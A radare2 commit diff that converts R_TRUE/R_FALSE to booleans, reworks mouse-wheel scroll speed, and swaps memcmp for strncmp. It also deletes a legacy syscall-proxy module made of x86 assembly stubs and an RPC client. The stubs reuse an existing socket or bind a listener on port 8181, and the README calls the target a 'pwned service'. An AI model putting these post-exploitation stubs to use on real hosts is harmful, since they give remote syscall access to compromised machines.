Honor wheelspeed, fix oob in vmenus and more boolification
This commit is contained in:
pancake
parent
633e5643b1
commit
4e47d86de0
|
|
@ -6,13 +6,13 @@
|
|||
static int r_config_setter_q(void *data) {
|
||||
RConfigNode *node = data;
|
||||
*(node->cb_ptr_q) = node->i_value;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
|
||||
static int r_config_setter_i(void *data) {
|
||||
RConfigNode *node = data;
|
||||
*(node->cb_ptr_i) = node->i_value;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
|
||||
static int r_config_setter_s(void *data) {
|
||||
|
|
@ -21,7 +21,7 @@ static int r_config_setter_s(void *data) {
|
|||
free (*node->cb_ptr_s);
|
||||
*node->cb_ptr_s = NULL;
|
||||
} else *node->cb_ptr_s = r_str_dup (*node->cb_ptr_s, node->value);
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
|
||||
R_API int r_config_set_setter_q(RConfig *cfg, const char *name, ut64 *ptr) {
|
||||
|
|
@ -29,9 +29,9 @@ R_API int r_config_set_setter_q(RConfig *cfg, const char *name, ut64 *ptr) {
|
|||
if (node) {
|
||||
node->cb_ptr_q = ptr;
|
||||
node->setter = (void *)&r_config_setter_q;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
R_API int r_config_set_setter_i(RConfig *cfg, const char *name, int *ptr) {
|
||||
|
|
@ -39,9 +39,9 @@ R_API int r_config_set_setter_i(RConfig *cfg, const char *name, int *ptr) {
|
|||
if (node) {
|
||||
node->cb_ptr_i = ptr;
|
||||
node->setter = (void *)&r_config_setter_i;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
R_API int r_config_set_setter_s(RConfig *cfg, const char *name, char **ptr) {
|
||||
|
|
@ -49,7 +49,7 @@ R_API int r_config_set_setter_s(RConfig *cfg, const char *name, char **ptr) {
|
|||
if (node) {
|
||||
node->cb_ptr_s = ptr;
|
||||
node->setter = (void *)&r_config_setter_s;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
|
|
|||
|
|
@ -136,9 +136,9 @@ R_API int r_config_swap(RConfig *cfg, const char *name) {
|
|||
RConfigNode *node = r_config_node_get (cfg, name);
|
||||
if (node && node->flags & CN_BOOL) {
|
||||
r_config_set_i (cfg, name, !node->i_value);
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
R_API ut64 r_config_get_i(RConfig *cfg, const char *name) {
|
||||
|
|
@ -227,7 +227,7 @@ R_API RConfigNode *r_config_set(RConfig *cfg, const char *name, const char *valu
|
|||
|
||||
if (node && node->setter) {
|
||||
int ret = node->setter (cfg->user, node);
|
||||
if (ret == R_FALSE) {
|
||||
if (ret == false) {
|
||||
if (oi != UT64_MAX)
|
||||
node->i_value = oi;
|
||||
free (node->value);
|
||||
|
|
@ -265,9 +265,9 @@ R_API int r_config_rm(RConfig *cfg, const char *name) {
|
|||
r_hashtable_remove (cfg->ht, node->hash);
|
||||
r_list_delete_data (cfg->nodes, node);
|
||||
cfg->n_nodes--;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
R_API RConfigNode *r_config_set_i(RConfig *cfg, const char *name, const ut64 i) {
|
||||
|
|
@ -311,7 +311,7 @@ R_API RConfigNode *r_config_set_i(RConfig *cfg, const char *name, const ut64 i)
|
|||
if (node && node->setter) {
|
||||
ut64 oi = node->i_value;
|
||||
int ret = node->setter (cfg->user, node);
|
||||
if (ret == R_FALSE) {
|
||||
if (ret == false) {
|
||||
node->i_value = oi;
|
||||
free (node->value);
|
||||
node->value = strdup (ov? ov: "");
|
||||
|
|
@ -324,24 +324,24 @@ R_API RConfigNode *r_config_set_i(RConfig *cfg, const char *name, const ut64 i)
|
|||
R_API int r_config_eval(RConfig *cfg, const char *str) {
|
||||
char *ptr, *a, *b, name[1024];
|
||||
unsigned int len;
|
||||
if (!str || !cfg) return R_FALSE;
|
||||
if (!str || !cfg) return false;
|
||||
len = strlen (str)+1;
|
||||
if (len >= sizeof (name))
|
||||
return R_FALSE;
|
||||
return false;
|
||||
memcpy (name, str, len);
|
||||
str = r_str_chop (name);
|
||||
|
||||
if (str == NULL)
|
||||
return R_FALSE;
|
||||
return false;
|
||||
|
||||
if (str[0]=='\0' || !strcmp (str, "help")) {
|
||||
r_config_list (cfg, NULL, 0);
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
if (str[0]=='-') {
|
||||
r_config_rm (cfg, str+1);
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
ptr = strchr (str, '=');
|
||||
|
|
@ -355,7 +355,7 @@ R_API int r_config_eval(RConfig *cfg, const char *str) {
|
|||
char *foo = r_str_chop (name);
|
||||
if (foo[strlen(foo)-1]=='.') {
|
||||
r_config_list (cfg, name, 0);
|
||||
return R_FALSE;
|
||||
return false;
|
||||
} else {
|
||||
/* get */
|
||||
const char *str = r_config_get(cfg, foo);
|
||||
|
|
@ -364,7 +364,7 @@ R_API int r_config_eval(RConfig *cfg, const char *str) {
|
|||
(((int)(size_t)str)==1)?"true":str);
|
||||
}
|
||||
}
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
|
||||
static int cmp(RConfigNode *a, RConfigNode *b) {
|
||||
|
|
@ -378,9 +378,9 @@ R_API void r_config_lock(RConfig *cfg, int l) {
|
|||
|
||||
R_API int r_config_readonly (RConfig *cfg, const char *key) {
|
||||
RConfigNode *n = r_config_node_get (cfg, key);
|
||||
if (!n) return R_FALSE;
|
||||
if (!n) return false;
|
||||
n->flags |= CN_RO;
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
|
||||
R_API RConfig *r_config_new(void *user) {
|
||||
|
|
|
|||
|
|
@ -1721,7 +1721,7 @@ reread:
|
|||
do_anal_search (core, ¶m, "?");
|
||||
break;
|
||||
}
|
||||
dosearch = 0;
|
||||
dosearch = false;
|
||||
break;
|
||||
case 'a': if (input[1]) {
|
||||
char *kwd = r_core_asm_search (core, input+param_offset,
|
||||
|
|
@ -1741,7 +1741,8 @@ reread:
|
|||
}
|
||||
} break;
|
||||
case 'C': {
|
||||
dosearch = param.crypto_search = true;
|
||||
dosearch = true;
|
||||
param.crypto_search = true;
|
||||
switch (input[1]) {
|
||||
case 'a':
|
||||
param.aes_search = true;
|
||||
|
|
@ -1750,7 +1751,8 @@ reread:
|
|||
param.rsa_search = true;
|
||||
break;
|
||||
default:{
|
||||
dosearch = param.crypto_search = false;
|
||||
dosearch = false;
|
||||
param.crypto_search = false;
|
||||
const char* help_msg[] = {
|
||||
"Usage: /C", "", "Search for crypto materials",
|
||||
"/Ca", "" , "Search for AES keys",
|
||||
|
|
|
|||
|
|
@ -1407,7 +1407,7 @@ R_API int r_core_config_init(RCore *core) {
|
|||
#endif
|
||||
SETPREF("scr.wheel", "true", "Mouse wheel in Visual; temporaryly disable/reenable by right click/Enter)");
|
||||
SETPREF("scr.atport", "false", "V@ starts a background http server and spawns an r2 -C");
|
||||
SETI("scr.wheelspeed", 1, "Mouse wheel speed");
|
||||
SETI("scr.wheelspeed", 4, "Mouse wheel speed");
|
||||
// DEPRECATED: USES hex.cols now SETI("scr.colpos", 80, "Column position of cmd.cprompt in visual");
|
||||
SETICB("scr.columns", 0, &cb_scrcolumns, "Force console column count (width)");
|
||||
SETCB("scr.rows", "0", &cb_scrrows, "Force console row count (height) ");
|
||||
|
|
|
|||
|
|
@ -2186,7 +2186,6 @@ static int likely = 0;
|
|||
static int show_slow = 0;
|
||||
|
||||
static int myregwrite(RAnalEsil *esil, const char *name, ut64 val) {
|
||||
int ret;
|
||||
char str[64], *msg = NULL;
|
||||
ut32 *n32 = (ut32*)str;
|
||||
likely = 1;
|
||||
|
|
@ -2201,8 +2200,8 @@ static int myregwrite(RAnalEsil *esil, const char *name, ut64 val) {
|
|||
if (fi) {
|
||||
strncpy (str, fi->name, sizeof (str)-1);
|
||||
}
|
||||
if (str[0] == 0) {
|
||||
ret = r_io_read_at (esil->anal->iob.io, val, (ut8*)str, sizeof (str)-1);
|
||||
if (!str[0]) {
|
||||
(void)r_io_read_at (esil->anal->iob.io, val, (ut8*)str, sizeof (str)-1);
|
||||
str[sizeof (str)-1] = 0;
|
||||
if (*str && r_str_is_printable (str)) {
|
||||
// do nothing
|
||||
|
|
|
|||
|
|
@ -2306,7 +2306,7 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti
|
|||
const char *key_s;
|
||||
RConsCanvas *can;
|
||||
RAGraph *g;
|
||||
int wheelspeed;
|
||||
int movspeed;
|
||||
int w, h;
|
||||
int ret;
|
||||
int invscroll;
|
||||
|
|
@ -2330,6 +2330,7 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti
|
|||
is_error = true;
|
||||
goto err_graph_new;
|
||||
}
|
||||
// deprecate ?
|
||||
g->movspeed = r_config_get_i (core->config, "graph.scroll");
|
||||
|
||||
grd = R_NEW (struct agraph_refresh_data);
|
||||
|
|
@ -2374,18 +2375,22 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti
|
|||
// r_core_graph_inputhandle()
|
||||
okey = r_cons_readchar ();
|
||||
key = r_cons_arrow_to_hjkl (okey);
|
||||
wheelspeed = r_config_get_i (core->config, "scr.wheelspeed");
|
||||
|
||||
switch (key) {
|
||||
case 'j':
|
||||
case 'k':
|
||||
switch (mousemode) {
|
||||
case 0: break;
|
||||
case 1: key = key=='k'?'h':'l'; break;
|
||||
case 2: key = key=='k'?'J':'K'; break;
|
||||
case 3: key = key=='k'?'L':'H'; break;
|
||||
if (core->cons->mouse_event) {
|
||||
movspeed = r_config_get_i (core->config, "scr.wheelspeed");
|
||||
switch (key) {
|
||||
case 'j':
|
||||
case 'k':
|
||||
switch (mousemode) {
|
||||
case 0: break;
|
||||
case 1: key = key=='k'?'h':'l'; break;
|
||||
case 2: key = key=='k'?'J':'K'; break;
|
||||
case 3: key = key=='k'?'L':'H'; break;
|
||||
}
|
||||
break;
|
||||
}
|
||||
break;
|
||||
} else {
|
||||
movspeed = r_config_get_i (core->config, "graph.scroll");
|
||||
}
|
||||
|
||||
switch (key) {
|
||||
|
|
@ -2492,9 +2497,8 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti
|
|||
case 'U':
|
||||
{
|
||||
ut64 off = r_io_sundo_redo (core->io);
|
||||
if (off != UT64_MAX)
|
||||
r_core_seek (core,off, 1);
|
||||
else eprintf ("Can not redo\n");
|
||||
if (off != UT64_MAX) r_core_seek (core,off, 1);
|
||||
else eprintf ("Cannot redo\n");
|
||||
break;
|
||||
}
|
||||
case 'R':
|
||||
|
|
@ -2508,16 +2512,11 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti
|
|||
/* TODO: reload only the body of the nodes to update colors */
|
||||
break;
|
||||
case '!':
|
||||
{
|
||||
/* TODO: remove this option once the colored are "stable" */
|
||||
int colors = r_config_get_i (core->config, "scr.color");
|
||||
r_config_set_i (core->config, "scr.color", !colors);
|
||||
r_config_set_i (core->config, "scr.color",
|
||||
!r_config_get_i (core->config, "scr.color"));
|
||||
g->need_reload_nodes = true;
|
||||
break;
|
||||
}
|
||||
case 'r':
|
||||
agraph_set_layout (g, true);
|
||||
break;
|
||||
case 'r': agraph_set_layout (g, true); break;
|
||||
case 'm':
|
||||
mousemode++;
|
||||
if (!mousemodes[mousemode])
|
||||
|
|
@ -2528,17 +2527,15 @@ R_API int r_core_visual_graph(RCore *core, RAnalFunction *_fcn, int is_interacti
|
|||
if (mousemode<0)
|
||||
mousemode = 3;
|
||||
break;
|
||||
case 'J': get_anode(g->curnode)->y += g->movspeed; break;
|
||||
case 'K': get_anode(g->curnode)->y -= g->movspeed; break;
|
||||
case 'H': get_anode(g->curnode)->x -= g->movspeed; break;
|
||||
case 'L': get_anode(g->curnode)->x += g->movspeed; break;
|
||||
case 'j': can->sy -= g->movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'k': can->sy += g->movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'l': can->sx -= g->movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'h': can->sx += g->movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'e':
|
||||
can->linemode = !!!can->linemode;
|
||||
break;
|
||||
case 'J': get_anode(g->curnode)->y += movspeed; break;
|
||||
case 'K': get_anode(g->curnode)->y -= movspeed; break;
|
||||
case 'H': get_anode(g->curnode)->x -= movspeed; break;
|
||||
case 'L': get_anode(g->curnode)->x += movspeed; break;
|
||||
case 'j': can->sy -= movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'k': can->sy += movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'l': can->sx -= movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'h': can->sx += movspeed * (invscroll ? -1 : 1); break;
|
||||
case 'e': can->linemode = !!!can->linemode; break;
|
||||
case 'p':
|
||||
agraph_toggle_small_nodes (g);
|
||||
agraph_update_seek (g, get_anode (g->curnode), true);
|
||||
|
|
|
|||
|
|
@ -4,6 +4,16 @@
|
|||
|
||||
#define MAX_FORMAT 3
|
||||
|
||||
typedef struct {
|
||||
RCore *core;
|
||||
int t_idx;
|
||||
int t_ctr;
|
||||
const char *type;
|
||||
char *curname;
|
||||
char *curfmt;
|
||||
const char *optword;
|
||||
} RCoreVisualTypes;
|
||||
|
||||
// TODO: move this helper into r_cons
|
||||
static char *prompt(const char *str, const char *txt) {
|
||||
char cmd[1024];
|
||||
|
|
@ -31,16 +41,6 @@ static char *prompt(const char *str, const char *txt) {
|
|||
return res;
|
||||
}
|
||||
|
||||
typedef struct {
|
||||
RCore *core;
|
||||
int t_idx;
|
||||
int t_ctr;
|
||||
const char *type;
|
||||
char *curname;
|
||||
char *curfmt;
|
||||
const char *optword;
|
||||
} RCoreVisualTypes;
|
||||
|
||||
static inline char *getformat (RCoreVisualTypes *vt, const char *k) {
|
||||
return sdb_get (vt->core->anal->sdb_types,
|
||||
sdb_fmt (0, "type.%s", k), 0);
|
||||
|
|
@ -543,55 +543,51 @@ R_API int r_core_visual_trackflags(RCore *core) {
|
|||
}
|
||||
|
||||
R_API int r_core_visual_comments (RCore *core) {
|
||||
char cmd[512], *p = NULL;
|
||||
int delta = 7;
|
||||
int i, ch, option = 0;
|
||||
int format = 0;
|
||||
int found = 0;
|
||||
ut64 from = 0, size = 0;
|
||||
#undef DB
|
||||
#define DB core->anal->sdb_meta
|
||||
const char *val, *comma = NULL;
|
||||
char *list = sdb_get (DB, "meta.C", 0);
|
||||
char *str, *next, *cur = list;
|
||||
char key[128], cmd[512], *p = NULL;
|
||||
int i, ch, option = 0, delta = 7;
|
||||
int format = 0, found = 0;
|
||||
ut64 addr, from = 0, size = 0;
|
||||
|
||||
for (;;) {
|
||||
r_cons_clear00 ();
|
||||
r_cons_strcat ("Comments:\n");
|
||||
i = 0;
|
||||
found = 0;
|
||||
#undef DB
|
||||
#define DB core->anal->sdb_meta
|
||||
ut64 addr;
|
||||
char key[128];
|
||||
const char *val, *comma = NULL;
|
||||
char *list = sdb_get (DB, "meta.C", 0);
|
||||
char *str, *next, *cur = list;
|
||||
if (list) {
|
||||
for (i=0; ;i++) {
|
||||
cur = sdb_anext (cur, &next);
|
||||
addr = sdb_atoi (cur);
|
||||
snprintf (key, sizeof (key)-1, "meta.C.0x%08"PFMT64x, addr);
|
||||
val = sdb_const_get (DB, key, 0);
|
||||
if (val)
|
||||
comma = strchr (val, ',');
|
||||
if (comma) {
|
||||
str = (char *)sdb_decode (comma+1, 0);
|
||||
if ((i>=option-delta) && ((i<option+delta)||((option<delta)&&(i<(delta<<1))))) {
|
||||
r_str_sanitize (str);
|
||||
if (option==i) {
|
||||
found = 1;
|
||||
from = addr;
|
||||
size = 1; // XXX: remove this thing size for comments is useless d->size;
|
||||
free (p);
|
||||
p = str;
|
||||
r_cons_printf (" > %s\n", str);
|
||||
} else {
|
||||
r_cons_printf (" %s\n", str);
|
||||
free (str);
|
||||
}
|
||||
} else free (str);
|
||||
if (list) {
|
||||
for (i=0; ;i++) {
|
||||
cur = sdb_anext (cur, &next);
|
||||
addr = sdb_atoi (cur);
|
||||
snprintf (key, sizeof (key)-1, "meta.C.0x%08"PFMT64x, addr);
|
||||
val = sdb_const_get (DB, key, 0);
|
||||
if (val)
|
||||
comma = strchr (val, ',');
|
||||
if (comma) {
|
||||
str = (char *)sdb_decode (comma+1, 0);
|
||||
if ((i>=option-delta) && ((i<option+delta)||((option<delta)&&(i<(delta<<1))))) {
|
||||
r_str_sanitize (str);
|
||||
if (option==i) {
|
||||
found = 1;
|
||||
from = addr;
|
||||
size = 1; // XXX: remove this thing size for comments is useless d->size;
|
||||
free (p);
|
||||
p = str;
|
||||
r_cons_printf (" > %s\n", str);
|
||||
} else {
|
||||
r_cons_printf (" %s\n", str);
|
||||
free (str);
|
||||
}
|
||||
if (!next)
|
||||
break;
|
||||
cur = next;
|
||||
}
|
||||
} else free (str);
|
||||
}
|
||||
if (!next)
|
||||
break;
|
||||
cur = next;
|
||||
}
|
||||
}
|
||||
|
||||
if (!found) {
|
||||
option--;
|
||||
|
|
@ -1026,7 +1022,7 @@ R_API void r_core_visual_mounts (RCore *core) {
|
|||
if (file->type == 'd') {
|
||||
strncat (path, file->name, sizeof (path)-strlen (path)-1);
|
||||
r_str_chop_path (path);
|
||||
if (!root || memcmp (root, path, strlen (root)-1))
|
||||
if (!root || strncmp (root, path, strlen (root)-1))
|
||||
strncpy (path, root, sizeof (path)-1);
|
||||
} else {
|
||||
r_core_cmdf (core, "s 0x%"PFMT64x, file->off);
|
||||
|
|
@ -1116,7 +1112,7 @@ R_API void r_core_visual_mounts (RCore *core) {
|
|||
if (file && root) {
|
||||
strncat (path, file->name, sizeof (path)-strlen (path)-1);
|
||||
r_str_chop_path (path);
|
||||
if (memcmp (root, path, strlen (root)-1))
|
||||
if (strncmp (root, path, strlen (root)-1))
|
||||
strncpy (path, root, sizeof (path)-1);
|
||||
file = r_fs_open (core->fs, path);
|
||||
if (file) {
|
||||
|
|
@ -1475,7 +1471,7 @@ R_API void r_core_seek_next(RCore *core, const char *type) {
|
|||
const char *pfx = r_config_get (core->config, "search.prefix");
|
||||
RFlagItem *flag;
|
||||
r_list_foreach (core->flags->flags, iter, flag) {
|
||||
if (!memcmp (flag->name, pfx, strlen (pfx)))
|
||||
if (!strncmp (flag->name, pfx, strlen (pfx)))
|
||||
if (flag->offset < next && flag->offset > core->offset)
|
||||
next = flag->offset;
|
||||
}
|
||||
|
|
@ -1486,7 +1482,7 @@ R_API void r_core_seek_next(RCore *core, const char *type) {
|
|||
next = flag->offset;
|
||||
}
|
||||
}
|
||||
if (next!=UT64_MAX)
|
||||
if (next != UT64_MAX)
|
||||
r_core_seek (core, next, 1);
|
||||
}
|
||||
|
||||
|
|
@ -1507,7 +1503,7 @@ R_API void r_core_seek_previous (RCore *core, const char *type) {
|
|||
RFlagItem *flag;
|
||||
const char *pfx = r_config_get (core->config, "search.prefix");
|
||||
r_list_foreach (core->flags->flags, iter, flag) {
|
||||
if (!memcmp (flag->name, pfx, strlen (pfx)))
|
||||
if (!strncmp (flag->name, pfx, strlen (pfx)))
|
||||
if (flag->offset > next && flag->offset< core->offset)
|
||||
next = flag->offset;
|
||||
}
|
||||
|
|
|
|||
|
|
@ -90,10 +90,10 @@ R_API int r_io_desc_del(RIO *io, int fd) {
|
|||
r_io_desc_free (d);
|
||||
iter->data = NULL; // enforce free
|
||||
r_list_delete (io->files, iter);
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return R_FALSE;
|
||||
return false;
|
||||
}
|
||||
|
||||
R_API RIODesc *r_io_desc_get(RIO *io, int fd) {
|
||||
|
|
|
|||
|
|
@ -115,7 +115,7 @@ R_API int r_io_vread (RIO *io, ut64 vaddr, ut8 *buf, int len) {
|
|||
r_list_free (maps); //free the list
|
||||
r_io_mread (io, io->desc->fd, vaddr, buf, len); //ensure that io->desc is always on the top
|
||||
}
|
||||
return R_TRUE;
|
||||
return true;
|
||||
}
|
||||
|
||||
/*you can throw any fd on this beast, it's important that len is equal or smaller than the size of buf*/
|
||||
|
|
|
|||
|
|
@ -1,33 +0,0 @@
|
|||
r_sysproxy
|
||||
==========
|
||||
|
||||
This module implements a multiarch/os proxy syscalling library.
|
||||
|
||||
ATM the contents of this directory are a mess.. See radare1 for a working
|
||||
implementation... Here we will specify a standard API and we will have to
|
||||
write sysproxy agents for other architectures and operating systems.
|
||||
|
||||
+-------------------+ +-----------------+
|
||||
| sysproxy listener | <--. .-- | sysproxy client |
|
||||
+-------------------+ | network | +-----------------+
|
||||
arch/os/dependant `-----------' radare sysproxy://
|
||||
|
||||
- listener agent
|
||||
- pwned service
|
||||
- ...
|
||||
|
||||
------------------------------------------------------
|
||||
sp = r_sysproxy_new ()
|
||||
if (fork()) {
|
||||
r_sysproxy_listen (sp, 9999);
|
||||
} else {
|
||||
r_sysproxy_connect (sp, "127.0.0.1", 9999);
|
||||
ret = r_sysproxy_call (sp, R_SYSPROXY_SC_WRITE, buf, 128);
|
||||
}
|
||||
------------------------------------------------------
|
||||
|
||||
The sysproxy r_io plugin implements a basic IO abstraction using
|
||||
sysproxy to remotely open/read/write files, but maybe also for remote
|
||||
debugging using ptrace() thru r_sysproxy.
|
||||
|
||||
--pancake
|
||||
|
|
@ -1,22 +0,0 @@
|
|||
.global getsock
|
||||
.code32
|
||||
|
||||
getsock:
|
||||
xorl %edx, %edx
|
||||
pushl %esp
|
||||
pushl %esp
|
||||
pushl %edx
|
||||
movl %esp, %ecx
|
||||
movl $6, %ebx
|
||||
|
||||
search_sock:
|
||||
movl $0x66, %eax
|
||||
inc %edx
|
||||
movl %edx, (%ecx)
|
||||
#getsockname
|
||||
int $0x80
|
||||
test %eax, %eax
|
||||
jnz search_sock
|
||||
|
||||
sock_found:
|
||||
movl %edx, %ebx
|
||||
|
|
@ -1,55 +0,0 @@
|
|||
.global lis_sock_tcp
|
||||
.code32
|
||||
|
||||
# th0rpe - 08-27-2007
|
||||
|
||||
lis_sock_tcp:
|
||||
# open port 8181 = 1FF5
|
||||
|
||||
#s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)
|
||||
pushl $0x6
|
||||
pushl $0x1
|
||||
pushl $0x2
|
||||
xorl %ebx, %ebx
|
||||
incl %ebx
|
||||
movl %esp, %ecx
|
||||
movl $0x66, %eax
|
||||
int $0x80
|
||||
|
||||
#save socket
|
||||
movl %eax, %edx
|
||||
|
||||
#bind(s, &b, 0x10)
|
||||
pushl $0x0
|
||||
pushl $0xF51F0002
|
||||
movl %esp, %eax
|
||||
pushl $0x10
|
||||
pushl %eax
|
||||
pushl %edx
|
||||
movl %esp, %ecx
|
||||
incl %ebx
|
||||
movl $0x66, %eax
|
||||
int $0x80
|
||||
|
||||
#listen(s, 5)
|
||||
pushl $0x5
|
||||
pushl %edx
|
||||
movl %esp, %ecx
|
||||
incl %ebx
|
||||
incl %ebx
|
||||
movl $0x66, %eax
|
||||
int $0x80
|
||||
|
||||
#accept(s, &b, &(0x10))
|
||||
pushl $0x10
|
||||
pushl %esp
|
||||
leal 8(%esp), %eax
|
||||
pushl %eax
|
||||
pushl %edx
|
||||
movl %esp, %ecx
|
||||
incl %ebx
|
||||
movl $0x66, %eax
|
||||
int $0x80
|
||||
|
||||
#save socket connection
|
||||
movl %eax, %ebx
|
||||
|
|
@ -1,34 +0,0 @@
|
|||
.global lis_sock_udp
|
||||
.code32
|
||||
|
||||
# th0rpe - 08-27-2007
|
||||
|
||||
lis_sock_udp:
|
||||
|
||||
#s = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP)
|
||||
pushl $17
|
||||
pushl $0x2
|
||||
pushl $0x2
|
||||
xorl %ebx, %ebx
|
||||
incl %ebx
|
||||
movl %esp, %ecx
|
||||
movl $0x66, %eax
|
||||
int $0x80
|
||||
|
||||
#save socket
|
||||
movl %eax, %edx
|
||||
|
||||
#bind(s, &b, 0x10)
|
||||
pushl $0x0
|
||||
pushl $0xF51F0002
|
||||
movl %esp, %eax
|
||||
pushl $0x10
|
||||
pushl %eax
|
||||
pushl %edx
|
||||
movl %esp, %ecx
|
||||
incl %ebx
|
||||
movl $0x66, %eax
|
||||
int $0x80
|
||||
|
||||
#save socket connection
|
||||
movl %edx, %ebx
|
||||
|
|
@ -1,134 +0,0 @@
|
|||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <errno.h>
|
||||
#include "sp.h"
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
static int rpc_con;
|
||||
static char rpc_data[MAX_PACKET];
|
||||
static char *remote_buf;
|
||||
|
||||
void dump(char *buf, int len)
|
||||
{
|
||||
int i;
|
||||
|
||||
printf("dump buf 0x%x with len %i\n", (unsigned int)buf, len);
|
||||
|
||||
for(i = 0; i < len; i++) {
|
||||
if(i % 16 == 0)
|
||||
printf("\n %.2x", (unsigned char)buf[i]);
|
||||
else
|
||||
printf(" %.2x", (unsigned char )buf[i]);
|
||||
}
|
||||
printf("\n");
|
||||
}
|
||||
|
||||
int dump_raw(char *buf, int len)
|
||||
{
|
||||
int i;
|
||||
for(i = 0;i < len; i++)
|
||||
printf("%c", buf[i]);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
inline char *rpc_data_at(int off)
|
||||
{
|
||||
return rpc_data + sizeof(struct regs) + off;
|
||||
}
|
||||
|
||||
int rpc_syscall(struct regs *rg,
|
||||
struct arg **args, int n_args)
|
||||
{
|
||||
char *p;
|
||||
int i;
|
||||
int ret;
|
||||
|
||||
/* copy arguments */
|
||||
p = (char *)(rpc_data + sizeof(*rg));
|
||||
|
||||
for(i = 0; i < n_args; p += args[i]->len, i++) {
|
||||
if(p + args[i]->len > rpc_data + MAX_PACKET) {
|
||||
errno = ENOMEM;
|
||||
return -1;
|
||||
}
|
||||
|
||||
memcpy(p, args[i]->buf, args[i]->len);
|
||||
}
|
||||
|
||||
/* copy registers */
|
||||
memcpy(rpc_data, rg, sizeof(*rg));
|
||||
|
||||
#ifdef DEBUG
|
||||
dump(rpc_data, (unsigned long)p - (unsigned long)rpc_data);
|
||||
#endif
|
||||
//dump_raw(rpc_data,(unsigned long)p - (unsigned long)rpc_data);
|
||||
|
||||
/* send rpc */
|
||||
ret = write(rpc_con, rpc_data,
|
||||
(unsigned long)p - (unsigned long)rpc_data);
|
||||
|
||||
|
||||
/* error? */
|
||||
if(ret < 0)
|
||||
return ret;
|
||||
|
||||
/* wait for response ... */
|
||||
ret = read(rpc_con, rpc_data, MAX_PACKET);
|
||||
if(ret < 0)
|
||||
return ret;
|
||||
|
||||
rg = (struct regs *)rpc_data;
|
||||
|
||||
return rg->eax;
|
||||
}
|
||||
|
||||
inline unsigned long rpc_reloc(int off)
|
||||
{
|
||||
return (unsigned long)(remote_buf + off);
|
||||
}
|
||||
|
||||
void rpc_init(char *host, int port)
|
||||
{
|
||||
struct sockaddr_in in;
|
||||
int ret;
|
||||
|
||||
memset(&in, 0, sizeof(in));
|
||||
in.sin_addr.s_addr = inet_addr(host);
|
||||
in.sin_port = htons(port);
|
||||
in.sin_family = AF_INET;
|
||||
|
||||
rpc_con = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
if(rpc_con < 0) {
|
||||
perror("socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if(connect(rpc_con, (struct sockaddr *)&in, sizeof(in)) < 0) {
|
||||
perror("rpc_connect");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
ret = read(rpc_con, &remote_buf, sizeof(char *));
|
||||
|
||||
if(ret < 0) {
|
||||
perror("read");
|
||||
exit(1);
|
||||
} else {
|
||||
printf("ret: %i\n", ret);
|
||||
if(ret != sizeof(char *)) {
|
||||
fprintf(stderr, "ERROR: Invalid buffer address!\n");
|
||||
//exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
printf("Remote buf: 0x%x\n", (unsigned int)remote_buf);
|
||||
}
|
||||
|
|
@ -1,22 +0,0 @@
|
|||
#ifndef SP_H
|
||||
#define SP_H
|
||||
|
||||
#define MAX_PACKET 2048
|
||||
|
||||
struct regs {
|
||||
unsigned int edi;
|
||||
unsigned int esi;
|
||||
unsigned int ebp;
|
||||
unsigned int xx;
|
||||
unsigned int ebx;
|
||||
unsigned int edx;
|
||||
unsigned int ecx;
|
||||
unsigned int eax;
|
||||
};
|
||||
|
||||
struct arg {
|
||||
char *buf;
|
||||
int len;
|
||||
};
|
||||
|
||||
#endif
|
||||
|
|
@ -1,398 +0,0 @@
|
|||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <string.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <errno.h>
|
||||
#include "sp.h"
|
||||
|
||||
extern unsigned long rpc_reloc(int off);
|
||||
extern char *rpc_data_at(int off);
|
||||
extern int rpc_syscall(struct regs *rg,
|
||||
struct arg **args, int n_args);
|
||||
|
||||
